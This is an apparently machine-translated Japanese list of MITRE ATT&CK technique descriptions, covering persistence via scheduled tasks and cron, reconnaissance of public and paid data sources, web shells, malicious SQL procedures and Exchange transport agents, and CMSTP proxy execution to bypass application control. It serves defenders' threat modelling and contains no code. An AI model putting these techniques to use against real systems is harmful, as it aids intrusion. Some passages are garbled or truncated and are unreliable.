ルートキットまたはルートキットを可能にする機能は、ハイパーバイザー、マスターブートレコード、[System Firmware](https://attack.mitre.org/techniques/T1542/001)を含む、オペレーティングシステムのユーザーレベルまたはカーネルレベル以下に存在することがある。(引用:Wikipedia Rootkit) ルートキットは、Windows、Linux、Mac OS Xの各システムで確認されています。(引用元:CrowdStrike Linux Rootkit)(引用元:BlackHat Mac OSX Rootkit
424
T1053 スケジュールされたタスク/ジョブ 敵対者は、タスクスケジューリング機能を悪用して、悪意のあるコードを最初または繰り返し実行する可能性があります。すべての主要なオペレーティングシステムには、指定した日時にプログラムやスクリプトが実行されるようにスケジュールするユーティリティが存在します。また、適切な認証が行われていれば、リモートシステム上でタスクをスケジューリングすることもできます(例:Windows環境におけるRPC、ファイルおよびプリンタの共有)。引用:TechNet Task Scheduler Security)

敵対者は、タスクスケジューリングを利用して、システムの起動時にプログラムを実行したり、持続性を持たせるためにスケジュールベースでプログラムを実行したりすることがあります。また、これらのメカニズムを悪用して、特定のアカウント(昇格した権限/特権を持つアカウントなど)のコンテキストでプロセスを実行することもできます。
425
T1053.001 Scheduled Task/Job:At (Linux) 敵対者は、[at](https://attack.mitre.org/software/S0110)ユーティリティを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジューリングを行う可能性があります。Linuxオペレーティングシステムの[at](https://attack.mitre.org/software/S0110)コマンドは、管理者がタスクをスケジューリングすることを可能にします。(引用:Kifarunix - Task Scheduling in Linux)

敵対者は、Linux環境で[at](https://attack.mitre.org/software/S0110)を使用して、システム起動時またはスケジュールベースでプログラムを実行し、持続させる可能性があります。また、[at](https://attack.mitre.org/software/S0110)を悪用して、横移動の一環としてリモート実行を行ったり、特定のアカウントのコンテキストでプロセスを実行したりすることも可能です。
426
T1053.002 Scheduled Task/Job:At (Windows) 敵対者は、<code>at.exe</code>ユーティリティを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジュールを実行する可能性があります。at](https://attack.mitre.org/software/S0110)ユーティリティは、指定された日時にタスクをスケジューリングするために、Windows内の実行ファイルとして存在しています。at](https://attack.mitre.org/software/S0110)を使用するには、Task Schedulerサービスが実行されていることと、ユーザーがローカルのAdministratorsグループのメンバーとしてログオンしていることが必要です。

敵対者は、Windows環境で<code>at.exe</code>を使用して、システムの起動時やスケジュールベースでプログラムを実行し、持続させることができます。また、[at](https://attack.mitre.org/software/S0110)を悪用して、横移動の一環としてリモート実行を行ったり、特定のアカウント(SYSTEMなど)のコンテキスト下でプロセスを実行したりすることもできます。

注意:Windowsの現行バージョンでは、<code>at.exe</code>コマンドラインユーティリティは、<code>schtasks</code>に取って代わられています。
427
T1053.007 Scheduled Task/Job:コンテナオーケストレーションジョブ 侵入者は、Kubernetesなどのコンテナオーケストレーションツールが提供するタスクスケジューリング機能を悪用して、悪意のあるコードを実行するように設定されたコンテナの展開をスケジューリングすることがあります。コンテナ・オーケストレーション・ジョブは、Linuxシステムのcronジョブのように、特定の日時にこれらの自動タスクを実行します。

Kubernetesでは、CronJobは、1つまたは複数のコンテナを実行して特定のタスクを実行するジョブをスケジュールするために使用することができます。(引用: Kubernetes Jobs)(引用: Kubernetes CronJob) したがって、敵対者はCronJobを利用して、悪意のあるコードを実行するジョブのデプロイをクラスタ内でスケジュールすることができます。(引用: Threat Matrix for Kubernetes)
428
T1053.003 スケジュールされたタスク/ジョブ。Cron 侵入者は、<code>cron</code>ユーティリティを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジューリングを行う可能性があります。<code>cron</code>ユーティリティは、Unix系OSの時間ベースのジョブスケジューラです。 <code>crontab</code>ファイルには、実行するcronエントリのスケジュールと実行時間の指定が含まれています。

敵対者は、LinuxやUnix環境で<code>cron</code>を使用して、システム起動時にプログラムを実行したり、持続的にスケジュールされたベースでプログラムを実行したりすることがあります。<code>cron</code>は、横移動の一部としてリモート実行を行ったり、特定のアカウントのコンテキストでプロセスを実行したりするためにも悪用されます。
429
T1053.004 Scheduled Task/Job:Launchd 敵対者は、<code>Launchd</code>デーモンを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジューリングを行う可能性があります。macOSにネイティブな<code>launchd</code>デーモンは、オペレーティングシステム内のサービスのロードとメンテナンスを担当しています。このプロセスでは、<code>/System/Library/LaunchDaemons</code>および<code>/Library/LaunchDaemons</code>にあるプロパティリスト(plist)ファイルから、各ローンチオンデマンドシステムレベルデーモンのパラメータをロードします(引用:AppleDocs Launch Agent Daemons)。これらのLaunchDaemonは、起動される実行ファイルを指し示すプロパティリストファイルを持っています(引用:Methods of Mac Malware Persistence)。

敵対者は、macOS環境で<code>launchd</code>デーモンを使用して、システム起動時やスケジュールベースで実行される新しい実行ファイルをスケジューリングし、持続させることがあります。<code>launchd</code>は、特定のアカウントのコンテキストでプロセスを実行するために悪用することもできます。<code>launchd</code>のようなデーモンは、rootユーザーアカウントの権限で実行され、どのユーザーアカウントがログインしているかに関わらず動作します。
430
T1053.005 Scheduled Task/Job:スケジュールされたタスク 敵対者は、Windowsタスクスケジューラを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジューリングを行う可能性があります。Windows のタスクスケジューラにアクセスする方法は複数あります。<code>schtasks</code>をコマンドラインで直接実行したり、コントロールパネルの「管理者ツール」セクション内のGUIを介してタスクスケジューラを開いたりすることができます。

非推奨の[at](https://attack.mitre.org/software/S0110)ユーティリティも敵対者に悪用される可能性があります(例:[At (Windows)](https://attack.mitre.org/techniques/T1053/002))。ただし、<code>at.exe</code>は、<code>schtasks</code>やコントロールパネルで作成されたタスクにはアクセスできません。

敵対者は、Windows Task Schedulerを使用して、システムの起動時や持続性を確保するためにスケジュールベースでプログラムを実行することができます。Windows Task Schedulerは、横移動の一環としてリモート実行を行ったり、特定のアカウント(SYSTEMなど)のコンテキスト下でプロセスを実行したりするために悪用されることもあります。
431
T1053.006 Scheduled Task/Job:Systemd Timers 侵入者は、systemd タイマーを悪用して、悪意のあるコードを最初または繰り返し実行するためのタスクスケジューリングを行う可能性があります。Systemd のタイマーは、ファイル拡張子が <code>.timer</code> のユニットファイルで、サービスを制御します。タイマーは、カレンダーのイベントに合わせて実行したり、開始点からの相対的な時間経過後に実行するように設定できます。Linux環境では、[Cron](https://attack.mitre.org/techniques/T1053/003)の代替として使用することができます。(Citation: archlinux Systemd Timers Aug 2020)

各<code>.timer</code>ファイルには、同じ名前の対応する<code>.service</code>ファイルが必要です。例えば。<code>example.timer</code>と<code>example.service</code>です。 <code>.service</code>ファイルは、systemdシステム・サービスマネージャによって管理される[Systemd Service](https://attack.mitre.org/techniques/T1543/002)ユニットファイルです。(引用:Linux man-pages: systemd January 2014) 特権タイマーは<code>/etc/systemd/system/</code>と<code>/usr/lib/systemd/system</code>に書かれ、ユーザーレベルは<code>~/.config/systemd/user/</code>に書き込まれます。

敵対者はsystemdのタイマーを使って、システム起動時やスケジュールベースで悪意のあるコードを実行して持続させることがあります。(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) 特権的なパスを使ってインストールされたタイマーは、ルートレベルの持続性を維持するために使われることがあります。また、敵対者はユーザーレベルの永続性を実現するために、ユーザーレベルのタイマーをインストールすることもあります。
432
T1029 転送予約 敵対者は、データ流出をスケジュール化して、1日のうちの特定の時間帯または一定の間隔でのみ実行することがあります。

スケジュールされた侵入が使用される場合、情報をネットワーク外に転送するために、[C2チャネルを介した侵入](https://attack.mitre.org/techniques/T1041)や[代替プロトコルを介した侵入](https://attack.mitre.org/techniques/T1048)など、他の侵入技術も適用される可能性があります。
433
T1113 スクリーンキャプチャ 敵対者は、操作の過程で情報を収集するために、デスクトップの画面キャプチャーを試みることがあります。画面キャプチャ機能は、侵害後の操作に使用されるリモートアクセスツールの機能として含まれている場合があります。スクリーンショットの撮影は、通常、<code>CopyFromScreen</code>、<code>xwd</code>、<code>screencapture</code>などのネイティブユーティリティーやAPIコールによっても可能です(引用:CopyFromScreen .NET)。
434
T1597 クローズドソースの検索 敵対者は、標的化の際に使用できる被害者に関する情報を閉鎖的な情報源から検索・収集することがあります。被害者に関する情報は、技術/脅威情報データのフィードを有料で購読するなど、評判の良い民間の情報源やデータベースから購入できる場合があります(引用:D3Secutrity CTI Feeds) 敵対者は、ダークウェブやサイバー犯罪のブラックマークネットなど、評判の良くない情報源から情報を購入することもできます(引用:ZDNET Selling Data)

敵対者は、収集しようとする情報に応じて、さまざまなクローズド・データベースを検索することがあります。これらの情報源からの情報は、他の形態の偵察(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)または[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593))、運用資源の確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Valid Accounts](https://attack.mitre.org/techniques/T1078))の機会を明らかにするかもしれません。
435
T1597.002 クローズドソースの検索テクニカルデータの購入 敵対者は、ターゲティングの際に使用できる被害者の技術情報を購入することができます。被害者に関する情報は、評判の良い民間の情報源やデータベースで購入できる場合があります。例えば、スキャンデータベースやその他のデータ集約サービスのフィードを有料で購読している場合などです。

敵対者は、すでに特定したターゲットに関する情報を購入したり、購入したデータを利用して侵入を成功させる機会を見つけたりすることがあります。脅威の担い手は、購入したデータから、従業員の連絡先や認証情報、被害者のインフラに関する仕様など、さまざまな技術的詳細情報を収集することがあります(引用:ZDNET Selling Data)。これらの情報源からの情報は、他の形態の偵察の機会を明らかにすることがあります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)や[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)など)、初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)や[Valid Accounts](https://attack.mitre.org/techniques/T1078)など)の機会があるかもしれません。
436
T1597.001 クローズドソースの検索脅威のインテルベンダー 敵対者は、ターゲティングの際に利用できる情報を求めて、脅威情報ベンダーのプライベートデータを検索することがあります。脅威情報ベンダーは、一般に報告されているデータよりも多くのデータを提供する有料のフィードやポータルを提供している場合があります。機密情報(顧客名やその他の識別子など)は編集されている場合がありますが、この情報には、標的となる業界、帰属の主張、成功したTTPや対策など、侵害に関する傾向が含まれている場合があります。(引用:D3Secutrity CTI Feeds)

敵対者は、行動可能な情報を収集するために、脅威情報ベンダーの非公開データを検索することがあります。脅威行為者は、自分たちのキャンペーンだけでなく、他の敵対者が行っているキャンペーンについても、自分たちがターゲットとする業界、能力・目的、その他の作戦上の関心事に合致するような情報・指標を求めることがあります。ベンダーから報告された情報は、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)または[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会を明らかにすることもあります。
437
T1596 オープンテクニカルデータベースの検索 敵対者は、自由に利用できる技術データベースを検索して、標的化の際に利用できる被害者の情報を探すことがあります。被害者に関する情報は、ドメインや証明書の登録、トラフィックやスキャンから収集したネットワークデータやアーティファクトの公開コレクションなど、オンラインのデータベースやリポジトリで入手できる可能性があります。(引用: WHOIS)(引用: DNS Dumpster)(引用: Circl Passive DNS)(引用: Medium SSL Cert)(引用: SSLShopper Lookup)(引用: DigitalShadows CDN)(引用: Shodan)

敵対者は、収集しようとする情報に応じて、さまざまな公開データベースを検索する可能性があります。これらの情報源からの情報は、他の形態の偵察(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)または[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593))、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)または[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Trusted Relationship](https://attack.mitre.org/techniques/T1199))の機会を発見するかもしれません。
438
T1596.004 オープンテクニカルデータベースの検索CDN 敵対者は、被害者に関するコンテンツ・デリバリー・ネットワーク(CDN)のデータを検索し、それをターゲティングの際に利用することがあります。CDNは、負荷分散された複数のサーバからコンテンツを配信することができます。

敵対者は、実行可能な情報を収集するためにCDNデータを検索することがあります。脅威の担い手は、オンラインリソースや検索ツールを利用して、CDN内のコンテンツサーバに関する情報を収集することができます。また、敵対者は、組織のWebサイトでホストされているコンテンツと同じ保護メカニズム(例:ログインポータル)を備えていない、ホストされることを意図していない機密情報をリークするCDNの誤設定を探し、ターゲットにすることもあります(引用:DigitalShadows CDN)。これらのソースからの情報は、他の形態の偵察の機会を明らかにすることがあります(例:[アクティブスキャン](https://attack.mitre.org/techniques/T1595)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用リソースの確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)や[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、初期アクセス(例:[Drive-by Compromise](https://attack.mitre.org/techniques/T1189))などの機会があるかもしれません。
439
T1596.001 オープンテクニカルデータベースを検索します。DNS/パッシブDNS 敵対者は、ターゲティングの際に利用できる被害者の情報を求めてDNSデータを検索することがあります。DNS情報には、登録されているネームサーバーや、標的のサブドメイン、メールサーバー、その他のホストのアドレッシングの概要を示すレコードなど、さまざまな詳細情報が含まれます。

敵対者は、実行可能な情報を収集するためにDNSデータを検索することがあります。脅威者は、標的となる組織のネームサーバーに直接問い合わせたり、ログに記録されたDNSクエリ応答の集中管理レポジトリ(パッシブDNSと呼ばれる)を検索したりすることができます(引用:DNS Dumpster)(引用:Circl Passive DNS) 敵対者は、内部ネットワークに関する情報を明らかにするDNSの誤設定や漏えいを探して標的にすることもあります。これらの情報は、他の形態の偵察(例:[被害者が所有するWebサイトの検索](https://attack.mitre.org/techniques/T1594)または[公開されているWebサイト/ドメインの検索](https://attack.mitre.org/techniques/T1593))、運用資源の確立(例:[インフラストラクチャの取得](https://attack.mitre.org/techniques/T1583)または[インフラストラクチャの侵害](https://attack.mitre.org/techniques/T1584))、および/または初期アクセス(例:[外部リモートサービス](https://attack.mitre.org/techniques/T1133)または[信頼できる関係](https://attack.mitre.org/techniques/T1199))の機会を明らかにする可能性があります。
440
T1596.003 オープンテクニカルデータベースの検索デジタル証明書 敵対者は、公開されたデジタル証明書のデータを検索して、ターゲティングの際に利用できる被害者の情報を探すことがあります。電子証明書は、署名されたコンテンツの出所を暗号で確認するために、認証局(CA)が発行するものです。暗号化された Web トラフィック(HTTPS SSL/TLS 通信)に使用されるようなこれらの証明書には、名前や 所在地など、登録された組織に関する情報が含まれています。

敵対者は、実行可能な情報を収集するためにデジタル証明書データを検索することがあります。デジタル証明書のデータは、組織によって署名された成果物(例:暗号化されたウェブトラフィッ クから使用された証明書は、コンテンツとともに提供される)からも入手できる可能性があります(例:中程度の SSL 証明書)。mitre.org/techniques/T1595)または[Phishing for Information](https://attack.mitre.org/techniques/T1598))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Trusted Relationship](https://attack.mitre.org/techniques/T1199))の機会が見つかるかもしれません。
441
T1596.005 オープンテクニカルデータベースの検索。スキャンデータベース 敵対者は、公開されているスキャンデータベースの中から、ターゲティングの際に利用できる被害者の情報を探し出すことがあります。様々なオンラインサービスでは、インターネットスキャン/調査の結果が継続的に公開されており、アクティブなIPアドレス、ホスト名、オープンポート、証明書、さらにはサーバのバナーなどの情報が収集されることがあります(引用:Shodan)

敵対者は、実行可能な情報を収集するためにスキャンデータベースを検索することがあります。脅威の行為者は、オンラインリソースやルックアップツールを使用して、これらのサービスから情報を収穫することができます。敵対者は、すでに特定されたターゲットに関する情報を探したり、これらのデータセットを利用して侵入を成功させる機会を見つけたりすることができます。これらのソースからの情報は、他の形態の偵察(例:[Active Scanning](https://attack.mitre.org/techniques/T1595)または[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190))の機会を発見するかもしれません。
442
T1596.002 オープンテクニカルデータベースの検索WHOIS 敵対者は、公開されているWHOISデータを検索して、ターゲティングの際に利用できる被害者の情報を探すことがあります。WHOISデータは、ドメイン名などのインターネットリソースの割り当てを行う地域インターネットレジストリ(RIR)が保管しています。誰でもWHOISサーバーに照会して、割り当てられたIPブロック、連絡先、DNSネームサーバーなど、登録されたドメインに関する情報を得ることができます。(引用:WHOIS)

敵対者は、行動可能な情報を収集するためにWHOISデータを検索することがあります。脅威となる人物は、オンラインリソースやコマンドラインユーティリティーを使ってWHOISデータを略奪し、潜在的な被害者に関する情報を得ることができます。これらのソースからの情報は、他の形態の偵察(例:[Active Scanning](https://attack.mitre.org/techniques/T1595)または[Phishing for Information](https://attack.mitre.org/techniques/T1598))、運用リソースの確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)または[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Trusted Relationship](https://attack.mitre.org/techniques/T1199))の機会を明らかにする可能性があります。
443
T1593 オープンサイト/ドメインの検索 敵対者は、自由に利用できるWebサイトやドメインを検索して、ターゲティングに利用できる被害者の情報を探すことがあります。被害者に関する情報は、ソーシャルメディアや新しいサイト、雇用や依頼・報酬の契約などの業務に関する情報が掲載されているサイトなど、様々なオンラインサイトで入手できる可能性があります。(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

敵対者は、収集しようとする情報に応じて、様々なオンラインサイトを検索する可能性があります。これらのソースからの情報は、他の形態の偵察(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)または[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Phishing](https://attack.mitre.org/techniques/T1566))の機会を明らかにするかもしれない。
444
T1593.002 公開されているウェブサイト/ドメインの検索検索エンジン 敵対者は、検索エンジンを利用して、標的となる被害者の情報を収集することがあります。検索エンジンサービスは、典型的にはオンラインサイトをクロールして文脈のインデックスを作成し、特定のキーワードや特定のタイプのコンテンツ(ファイルタイプなど)を検索するための特殊な構文をユーザーに提供することがあります(引用:SecurityTrails Google Hacking)(引用:ExploitDB GoogleHacking)

敵対者は、収集しようとする情報に応じて、さまざまな検索エンジンのクエリを作成する可能性があります。脅威の担い手は、検索エンジンを使って被害者に関する一般的な情報を収集するだけでなく、特殊なクエリを使ってネットワークの詳細や認証情報などの機密情報の流出や漏洩を探すこともあります。これらの情報源からの情報は、他の形態の偵察(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)または[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、および/または初期アクセス(例:[Valid Accounts](https://attack.mitre.org/techniques/T1078)または[Phishing](https://attack.mitre.org/techniques/T1566))の機会を明らかにするかもしれません。
445
T1593.001 オープンなウェブサイト/ドメインの検索ソーシャルメディア 敵対者は、ターゲティングの際に利用できる被害者の情報をソーシャルメディアで探すことがあります。ソーシャル・メディア・サイトには、ビジネス・アナウンスやスタッフの役割、所在地、関心事など、被害者組織に関するさまざまな情報が含まれている可能性があります。

敵対者は、収集しようとする情報に応じて、さまざまなソーシャルメディア・サイトを検索する可能性があります。脅威の担い手は、これらのサイトからデータを受動的に収集するだけでなく、収集した情報を使って偽のプロフィールやグループを作成し、被害者から特定の情報を聞き出そうとすることもあります(例:[Spearphishing Service](https://attack.mitre.org/techniques/T1598/001))。(引用:Cyware Social Media)これらのソースからの情報は、他の形態の偵察の機会を提供することがあります(例:[Phishing for Information](https://attack.mitre.org/techniques/T1598)や[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)など)、運用リソースの確立(例:[Establish Accounts](https://attack.mitre.org/techniques/T1585)や[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、初期アクセス(例:[Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))などの機会があるかもしれません。
446
T1594 被害者が運営するサイトの検索 敵対者は、被害者が所有するWebサイトを検索して、ターゲティングの際に利用できる情報を探すことがあります。被害者が所有するWebサイトには、部署名、物理的な所在地、主要な従業員の名前や役割、連絡先などのデータ(例:[メールアドレス](https://attack.mitre.org/techniques/T1589/002))など、さまざまな情報が含まれている可能性があります。また、これらのサイトには、事業運営や関係性を示す詳細情報が掲載されていることもあります(引用:Comparitech Leak)

敵対者は、行動可能な情報を収集するために、被害者が所有するウェブサイトを検索することがあります。これらの情報は、他の形態の偵察(例:[情報提供のためのフィッシング](https://attack.mitre.org/techniques/T1598)または[オープンな技術データベースの検索](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[アカウントの確立](https://attack.mitre.org/techniques/T1585)または[アカウントの危殆化](https://attack.mitre.org/techniques/T1586))、および/または初期アクセス(例:[信頼できる関係](https://attack.mitre.org/techniques/T1199)または[フィッシング](https://attack.mitre.org/techniques/T1566))の機会を明らかにするかもしれない。
447
T1505 サーバーソフトウェアコンポーネント 敵対者は、サーバの正当な拡張性のある開発機能を悪用して、システムへの永続的なアクセスを確立する可能性があります。企業向けサーバアプリケーションには、開発者がソフトウェアやスクリプトを書いてインストールすることで、メインアプリケーションの機能を拡張できる機能が含まれている場合があります。敵対者は、悪意のあるコンポーネントをインストールして、サーバアプリケーションを拡張・悪用する可能性があります。 448
T1505.001 サーバーソフトウェアコンポーネント。SQLストアドプロシージャ 侵入者は、SQL ストアドプロシージャを悪用して、システムへの永続的なアクセスを確立することがあります。SQL ストアドプロシージャは、保存して再利用できるコードであり、データベースのユーザが頻繁に使用する SQL クエリを書き直す時間を無駄にしないようにします。ストアドプロシージャは、プロシージャ名を使用したデータベースへの SQL 文や、定義されたイベント(例:SQL サーバアプリケーションの起動/再起動時)を介して呼び出すことができます。

敵対者は、SQL データベースサーバに永続性メカニズムを提供できる、悪意のあるストアドプロシージャを作成するかもしれません。(引用:NetSPI Startup Stored Procedures)(引用:Kaspersky MSSQL Aug 2019) SQL構文を使ってオペレーティングシステムのコマンドを実行するために、敵対者はMSSQL Serverのxp_cmdshellなどの追加機能を有効にする必要があるかもしれません。(引用:NetSPI Startup Stored Procedures)(引用:Kaspersky MSSQL Aug 2019)(引用:Microsoft xp_cmdshell 2017)

Microsoft SQL Serverでは、共通言語ランタイム(CLR)統合を有効にすることができます。CLR統合を有効にすると、アプリケーション開発者は、任意の.NETフレームワーク言語(VB .NET、C#など)を使用してストアドプロシージャを記述することができます(引用:Microsoft CLR Integration 2017)ストアドプロシージャにリンクされているCLRアセンブリは、任意のコマンドを実行させることができるため、敵対者は、CLRアセンブリを細工または修正することができます(引用:NetSPI SQL Server CLR)。
449
T1505.002 サーバーソフトウェアコンポーネント。トランスポートエージェント 敵対者は、マイクロソフトのトランスポートエージェントを悪用して、システムへの永続的なアクセスを確立する可能性があります。Microsoft Exchangeのトランスポートエージェントは、トランスポートパイプラインを通過する電子メールメッセージを操作して、スパムのフィルタリング、悪意のある添付ファイルのフィルタリング、ジャーナリング、またはすべての送信電子メールの末尾に企業署名を追加するなど、さまざまなタスクを実行することができます。(引用: Microsoft TransportAgent Jun 2016)(引用: ESET LightNeuron May 2019) トランスポートエージェントは、アプリケーション開発者が記述し、その後Exchangeサーバーに登録される.NETアセンブリにコンパイルすることができます。トランスポート・エージェントは、電子メール処理の特定の段階で呼び出され、開発者が定義したタスクを実行します。

敵対者は、悪意のあるトランスポート・エージェントを登録して、敵が指定した電子メールのイベントで起動できる永続性メカニズムをExchange Serverに提供することができます。(引用:ESET LightNeuron 2019年5月) 悪意のあるトランスポート・エージェントは、Exchangeトランスポート・パイプラインを通過するすべての電子メールに対して起動される可能性がありますが、敵が定義した基準に応じて特定のタスクのみを実行するようにエージェントを構成することができます。例えば、トランスポートエージェントは、受信者の電子メールアドレスが敵対者が提供したリストのエントリに一致する場合にのみ、転送中の添付ファイルをコピーして後の流出用に保存するといったアクションを実行することができます。
450
T1505.003 サーバーソフトウェアコンポーネント。ウェブシェル 敵対者は、システムへの持続的なアクセスを確立するために、Webシェルを使ってWebサーバにバックドアを仕掛けることがあります。Web シェルとは、一般にアクセス可能な Web サーバに設置される Web スクリプトのことで、敵対者が Web サーバをネットワークへのゲートウェイとして使用できるようにするためのものです。

Web シェルは、サーバー側のスクリプトに加えて、Web サーバーとの通信に使用されるクライアント・インターフェイス・プログラムを備えている場合があります(例:[China Chopper](https://attack.mitre.org/software/S0020) Web シェル・クライアント)。(Citation: Lee 2013)
451
T1489 サービスストップ 敵対者は、システム上のサービスを停止または無効にして、それらのサービスを正当なユーザーが利用できないようにすることがあります。重要なサービスやプロセスを停止することで、インシデントへの対応を阻害または停止したり、環境に損害を与えるという敵対者の全体的な目的を助けたりすることができます(引用:Talos Olympic Destroyer 2018)(引用:Novetta Blockbuster)

敵対者は、Exchangeコンテンツにアクセスできなくなる<code>MSExchangeIS</code>など、組織にとって重要度の高い個々のサービスを停止することでこれを達成することがあります(引用:Novetta Blockbuster)。場合によっては、敵対者はシステムを使用不能にするために、多くのサービスまたはすべてのサービスを停止または無効にすることがあります(引用:Talos Olympic Destroyer 2018)サービスまたはプロセスは、実行中にそのデータストアの変更を許可しないことがあります。敵対者は、ExchangeやSQL Serverなどのサービスのデータストアに対して[Data Destruction](https://attack.mitre.org/techniques/T1485)や[Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)を行うために、サービスやプロセスを停止させる可能性があります(引用:SecureWorks WannaCry Analysis)
452
T1129 共有モジュール 侵入者は、共有モジュールを悪用して悪意のあるペイロードを実行する可能性があります。Windowsのモジュールローダーは、任意のローカルパスや任意のUNC(Universal Naming Convention)ネットワークパスからDLLをロードするように指示することができます。この機能はNTDLL.dllに存在し、Windows [Native API](https://attack.mitre.org/techniques/T1106)の一部であり、Win32 APIの<code>CreateProcess</code>や<code>LoadLibrary</code>などの関数から呼び出される。(引用:Wikipedia Windows Library Files)

モジュールローダは、次のようにDLLをロードすることができます:

* IMPORTディレクトリの(完全修飾または相対)DLLパス名の指定を介して、

* EXPORTを介して、(完全修飾または相対)パス名(ただし拡張子なし)で指定された別のDLLに転送して、

* NTFSジャンクションまたはシンボリックリンクプログラムを介して。IMPORTディレクトリまたは転送されたEXPORTで指定されたDLLを含むディレクトリの完全修飾または相対パス名を持つexe.local;

* 組み込みまたは外部の「アプリケーションマニフェスト」の<code>&#x3c;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&#x3e;</code>を介して。

敵対者は、被害者のシステム上で任意のコードを実行する方法として、この機能を使用する可能性があります。例えば、マルウェアがシェアモジュールを実行して、追加のコンポーネントや機能をロードすることがあります。
453
T1218 署名付きバイナリプロキシの実行 侵入者は、署名付きのバイナリで悪意のあるコンテンツの実行を代理することで、プロセスや署名ベースの防御を回避することができます。信頼できるデジタル証明書で署名されたバイナリは、デジタル署名検証で保護されたWindowsシステムで実行できます。Windows インストールにデフォルトで搭載されているいくつかの Microsoft 署名付きバイナリは、他のファイルの実行をプロキシするために使用できます。 454
T1218.003 署名付きバイナリプロキシの実行CMSTP 侵入者は、CMSTPを悪用して、悪意のあるコードの実行をプロキシすることがあります。Microsoft Connection Manager Profile Installer(CMSTP.exe)は、Connection Managerのサービスプロファイルのインストールに使用されるコマンドラインプログラムです。(引用:Microsoft Connection Manager Oct 2009) CMSTP.exeは、インストール情報ファイル(INF)をパラメータとして受け取り、リモートアクセス接続に利用されるサービスプロファイルをインストールします。

敵対者は、悪意のあるコマンドに感染したINFファイルをCMSTP.exeに供給する可能性があります。(引用:Twitter CMSTP Usage 2018年1月) [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/「Squiblydoo」と同様に、CMSTP.exeは、リモートサーバーからDLL(引用:MSitPros CMSTP 2017年8月)および/またはCOMスクリプトレット(SCT)をロードして実行するために悪用される可能性があります。(引用:Twitter CMSTP 2018年1月) (引用:GitHub Ultimate AppLocker Bypass List) (引用:Endurant CMSTP 2018年7月) CMSTP.exeは署名された正規のMicrosoftアプリケーションであるため、この実行はAppLockerや他のアプリケーション制御の防御をバイパスする可能性もあります。

CMSTP.exeは、[Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)に悪用され、悪意のあるINFから自動昇格したCOMインターフェイスを介して任意のコマンドを実行することもできます。(引用:MSitPros CMSTP 2017年8月) (引用:GitHub Ultimate AppLocker Bypass List) (引用:Endurant CMSTP 2018年7月)
455
